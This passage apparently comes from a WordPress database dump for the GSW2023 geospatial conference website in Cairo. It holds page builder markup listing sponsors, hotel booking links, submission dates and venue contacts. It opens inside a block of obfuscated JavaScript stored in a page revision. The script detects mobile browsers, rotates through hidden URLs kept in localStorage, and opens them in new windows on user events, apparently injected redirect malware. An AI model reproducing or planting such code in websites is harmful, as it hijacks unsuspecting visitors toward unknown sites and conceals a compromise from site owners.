|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:07:30','2023-06-01 08:07:30','',3066,'https://gsw2023.com/?p=4596',0,'revision','',0),
(4597,1,'2023-06-01 08:36:58','2023-06-01 08:36:58','','giscon','','inherit','open','closed','','giscon','','','2023-06-01 08:36:58','2023-06-01 08:36:58','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/giscon.jpg',0,'attachment','image/jpeg',0),
(4598,1,'2023-06-01 08:38:00','2023-06-01 08:38:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 